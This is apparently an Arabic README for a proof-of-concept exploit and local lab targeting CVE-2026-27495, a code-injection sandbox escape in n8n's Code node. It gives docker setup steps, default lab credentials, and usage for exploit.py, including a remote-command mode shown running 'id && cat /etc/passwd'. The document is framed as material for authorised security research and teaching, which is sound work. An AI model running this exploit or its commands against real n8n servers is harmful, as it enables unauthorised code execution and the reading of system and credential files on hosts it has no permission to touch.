
إثبات المفهوم للاستغلال وبيئة مختبر لـ CVE-2026-27495
| CVE | CVE-2026-27495 |
| CVSS | 9.4 (حرج) |
| CWE | CWE-94 — حقن التعليمات البرمجية |
| المتأثر | n8n < 1.123.22 / 2.0.0–2.9.2 / 2.10.0 |
| الإصلاح | 1.123.22 / 2.9.3 / 2.10.1 |
| سطح الهجوم | عقدة الكود (مُصادق، تمكين مشغلي المهام) |
docker compose up -d
انتظر حوالي 15 ثانية حتى يبدأ n8n، ثم افتح http://localhost:5678 وأنشئ حساب مالك (البريد الإلكتروني: [email protected]، كلمة المرور: TestPassword123!).
pip install requests
فحص هروب الصندوق الرملي :
python3 exploit.py --probe
RCE — قم بإلغاء تعليق NODE_FUNCTION_ALLOW_BUILTIN=* في docker-compose.yml، ثم أعد التشغيل:
docker compose down && docker compose up -d
python3 exploit.py --cmd "id && cat /etc/passwd"
الإعداد لأول مرة (ينشئ حساب المالك تلقائيًا):
python3 exploit.py --setup --probe
Options:
--url URL n8n base URL (default: http://localhost:5678)
--email EMAIL Login email (default: [email protected])
--password PASSWORD Login password
--cmd CMD OS command to execute (RCE)
--setup Create owner account (fresh instance)
--probe Probe sandbox escape only (no RCE, works with any config)
--proxy PROXY HTTP proxy (e.g. http://127.0.0.1:8080)
لأغراض البحث الأمني المصرح به والتعليم فقط.